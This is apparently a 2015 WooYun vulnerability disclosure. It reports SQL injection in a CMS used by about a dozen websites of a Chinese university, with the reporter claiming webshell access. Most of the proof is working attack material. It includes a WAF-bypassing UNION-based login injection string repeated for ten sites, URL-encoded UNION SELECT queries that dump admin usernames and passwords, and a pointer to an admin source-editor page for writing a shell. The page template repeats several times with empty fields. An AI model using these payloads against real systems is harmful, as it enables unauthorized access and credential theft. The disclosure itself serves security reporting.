国际关系学院12个站点注入打包，可拿shell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135400

漏洞标题：国际关系学院12个站点注入打包，可拿shell

漏洞作者：路人甲

提交时间：2015-08-20 10:25

修复时间：2015-10-08 08:34

公开时间：2015-10-08 08:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-20：细节已通知厂商并且等待厂商处理中
2015-08-24：厂商已经确认，细节仅向厂商公开
2015-09-03：细节向核心白帽子及相关领域专家公开
2015-09-13：细节向普通白帽子公开
2015-09-23：细节向实习白帽子公开
2015-10-08：细节向公众公开

简要描述：

国际关系学院12个站点注入打包，绝大部分可GetShell，共影响20+个站点。

详细说明：

看完介绍，吓得我想看看有多安全。
发现该学院12个站点存在注入漏洞，可进后台，getshell，影响面达20+个子站。

漏洞证明：

#1 http://**.**.**.**/
发现注入点

http://**.**.**.**/search.php --data="skey=1'"

用sqlmap注入，的账户密码
后台地址如下，同样存在注入漏洞，尝试构造万能账户，发现有waf，失败

http://**.**.**.**/admin/

注入点可确定，位于

select * from `xxx_user` where `username`='xxxx' limit 0, 1;

后台逻辑不当，有源代码管理界面，直接写shell

http://**.**.**.**/admin/aiweb_php_file.php

在下列文件发现80sec的简单waf

/cls/cls_db_mysql.php

根据该waf，尝试构造以下万能账户，成功登陆后台，应该是当前CMS的通杀神器，先记住

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

开始用万能账户拿其它分站
#2 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

源代码编辑页面，拿shell

http://**.**.**.**/admin/aiweb_php_file.php

#3 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2 from dual where ''='
密码: admin

源代码编辑页面，可拿shell

http://**.**.**.**/admin/aiweb_php_file.php

都是一样的CMS，下边就不上图了
#4 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

#5 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2 from dual where ''='
密码: admin

#6 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2 from dual where ''='
密码: admin

#7 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

#8 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

#9 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

#10 http://**.**.**.**/admin/login.php
payload

用户名: 'and@`'`/*!50000union*/select@^1,1,'admin','21232f297a57a5a743894a0e4a801fc3','超级管理员','**.**.**.**',null,null,null,null,null,null,'2015-08-19 15:13:52',null,1,18,'**.**.**.**',1,2,null,null, null from dual where ''='
密码: admin

#11 http://**.**.**.**/admin/login.php
访问

http://**.**.**.**/view.php?cid=6&tid=0%20and@`%27`/*!50000union*/select@^1,2,3,username,password,6%20from%20ilinju_user%20where%20%27%27=%27%27

的用户名密码

admin:admin

#12 http://**.**.**.**/admin/login.php
访问

http://**.**.**.**/news.view.php?id=0%20and@`%27`/*!50000union*/select@^1,2,3,iuser,5,6,7,8,9,ipass,11,12,9,9,9%20from%20uir_admin%20where%20%27%27=%27%27

得后台用户名密码
访问

http://**.**.**.**/news.view.php?id=0%20and@`%27`/*!50000union*/select@^1,2,3,iuser,5,6,7,8,9,ipass,11,12,9,9,9%20from%20uir_user_wai%20where%20%27%27=%27%27%20limit%200,1

得用户密码
#受影响的部分站点
通过上述漏洞收集的MD5，可登陆以下后台，
http://**.**.**.**/admin/
http://**.**.**.**/admin/
http://**.**.**.**/admin/
http://**.**.**.**/admin/
(etc ...)

修复方案：

开除开发这套CMS的人。。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-08-24 08:33

厂商回复：

通知处理中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135400

漏洞标题：国际关系学院12个站点注入打包，可拿shell

相关厂商：CCERT教育网应急响应组

漏洞作者：路人甲

提交时间：2015-08-20 10:25

修复时间：2015-10-08 08:34

公开时间：2015-10-08 08:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135400

漏洞标题：国际关系学院12个站点注入打包，可拿shell

相关厂商：CCERT教育网应急响应组

漏洞作者： 路人甲

提交时间：2015-08-20 10:25

修复时间：2015-10-08 08:34

公开时间：2015-10-08 08:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0135400"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云